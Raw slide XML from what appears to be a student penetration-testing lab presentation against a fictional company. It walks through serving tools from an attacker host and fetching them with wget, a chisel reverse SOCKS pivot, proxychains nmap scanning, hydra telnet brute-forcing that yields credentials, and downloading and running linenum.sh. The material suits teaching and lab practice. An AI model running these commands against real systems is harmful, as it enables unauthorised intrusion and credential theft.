            <a:ext cx="8458200" cy="144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a96dc51dba_0_81"/>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Proof of Concept (Mitigation testing)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="333" name="Google Shape;333;ga96dc51dba_0_81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7244"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="271475" y="1579575"/>
            <a:ext cx="4572001" cy="3035300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="334" name="Google Shape;334;ga96dc51dba_0_81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4767276"/>
            <a:ext cx="7924800" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="335" name="Google Shape;335;ga96dc51dba_0_81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4901970" y="3210650"/>
            <a:ext cx="4018181" cy="604500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;ga96dc51dba_0_81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="1814525"/>
            <a:ext cx="2928900" cy="8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From here we can see that we are unable to exploit it from the website part</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
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665163" y="893763"/>
            <a:ext cx="7781925" cy="60483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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1828800"/>
            <a:ext cx="7685088" cy="46783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Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Cool4Guys is a company dedicated to interactive and digital entertainment. And is responsible for the creation of their 4G Gaming Console line and family of products and services. </a:t>
            </a:r>
            <a:endParaRPr sz="2800" i="1">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b9f1380cfe_1_0"/>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Moving of tools to Web Server </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Google Shape;343;gb9f1380cfe_1_0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="1651000"/>
            <a:ext cx="7477200" cy="47562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Using sudo python -m SimpleHTTPServer 8000 in the websend dir in the attacker to the /tmp/tools of the web server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>sudo python -m SimpleHTTPServer 8000</a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>wget http://180.129.48.20:8000/&lt;program&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="344" name="Google Shape;344;gb9f1380cfe_1_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="3429000"/>
            <a:ext cx="5524500" cy="1057275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="345" name="Google Shape;345;gb9f1380cfe_1_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="5187875"/>
            <a:ext cx="4076700" cy="428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b9f1380cfe_1_9"/>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Pivoting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;gb9f1380cfe_1_9"/>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Run command on attacker machine (180.129.48.20)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>./chisel server -p 8001 --reverse</a:t>
            </a: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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Run command on Web Server machine (192.168.1.3 || 10.0.0.3)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>./chisel client 180.129.48.20:8001 R:1080:socks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="353" name="Google Shape;353;gb9f1380cfe_1_9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="2838275"/>
            <a:ext cx="6553200" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="354" name="Google Shape;354;gb9f1380cfe_1_9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="5130550"/>
            <a:ext cx="6605422" cy="1142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b9f1380cfe_1_19"/>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Pivoting - Proxy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361;gb9f1380cfe_1_19"/>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On the attacker machine </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>sudo nano /etc/proxychains.conf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and add </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>socks5 127.0.0.1 1080</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="362" name="Google Shape;362;gb9f1380cfe_1_19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="4299525"/>
            <a:ext cx="2409825" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="363" name="Google Shape;363;gb9f1380cfe_1_19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="3571050"/>
            <a:ext cx="3752850" cy="590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b9f1380cfe_1_29"/>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Nmap using proxy </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Google Shape;370;gb9f1380cfe_1_29"/>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proxychains nmap -n -vv -sn 10.0.0.0-255 -oG - | grep -i ‘up’</a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>found out that 10.0.0.47 is up. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="371" name="Google Shape;371;gb9f1380cfe_1_29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665588" y="2517225"/>
            <a:ext cx="6029325" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="372" name="Google Shape;372;gb9f1380cfe_1_29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="4867500"/>
            <a:ext cx="4153674" cy="1142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b9f1380cfe_1_37"/>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Brute force telnet </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;gb9f1380cfe_1_37"/>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Since from the web server we know that the webadmin is called dave and have the email address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>webadmin@cool4guys.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>we can check to confirm that the email and the user is on the 10.0.0.47, using vrfy command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="380" name="Google Shape;380;gb9f1380cfe_1_37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="3911900"/>
            <a:ext cx="6515100" cy="2190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b9f1380cfe_1_45"/>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Brute force telnet using hydra</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;gb9f1380cfe_1_45"/>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user.txt </a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>pass.txt</a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>password is the top 100 commonly used password.  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="388" name="Google Shape;388;gb9f1380cfe_1_45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1980825" y="1823675"/>
            <a:ext cx="3362325" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389" name="Google Shape;389;gb9f1380cfe_1_45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1980825" y="3429000"/>
            <a:ext cx="3295650" cy="2343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b9f1380cfe_1_53"/>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96" name="Google Shape;396;gb9f1380cfe_1_53"/>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proxychains hydra -L user.txt -P pass.txt 10.0.0.47 telnet -V</a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>Credential found is username: dave password:baseball</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="397" name="Google Shape;397;gb9f1380cfe_1_53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-15700" y="2210471"/>
            <a:ext cx="9144002" cy="415900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b9f1380cfe_1_60"/>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Login to dave using telnet</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Google Shape;404;gb9f1380cfe_1_60"/>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proxychains telnet 10.0.0.47 23 and logon using dave’s credentials. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="405" name="Google Shape;405;gb9f1380cfe_1_60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665163" y="2532013"/>
            <a:ext cx="5305425" cy="4086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b9f1380cfe_1_67"/>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Send over linux enumeration scripts </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Google Shape;412;gb9f1380cfe_1_67"/>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python server.py 10.0.0.3:80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The mail server can only accept the port 80, so in order to send the script over, we need to stop the apache2 server on the web server first. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Also we have to setup the server at the correct interface in order for the mail server to be able to wget it. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>So we will use the server.py script that allows me to select which interface i want to host my server on. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="413" name="Google Shape;413;gb9f1380cfe_1_67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="5149350"/>
            <a:ext cx="5848350" cy="381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b9f1380cfe_1_74"/>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20" name="Google Shape;420;gb9f1380cfe_1_74"/>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Get the script with wget </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>wget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://10.0.0.3:80/linenum.sh</a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>and chmod and run it.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="421" name="Google Shape;421;gb9f1380cfe_1_74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2668625"/>
            <a:ext cx="8839199" cy="1520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
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665163" y="893763"/>
            <a:ext cx="7781925" cy="60483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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Project Specification</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Google Shape;201;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123575" y="1657350"/>
            <a:ext cx="8835000" cy="514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a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Storyboard</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="0" i="1" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-406400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Story 1 (Our Demonstration)</a:t>
            </a:r>
            <a:endParaRPr sz="2800" i="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2800" i="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An attacker from outside (public) want to steal the secret formula for our console. To make this, the attacker saw the vulnerability in the website of the company try to exploit to gain the secret formula from there in the file server. The whole purpose of attack from outside is to get a file that can only be accessed with people with high privilege(NT/Authority) Which contains the employee data, and the secret technology that we use to create our consoles.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AutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
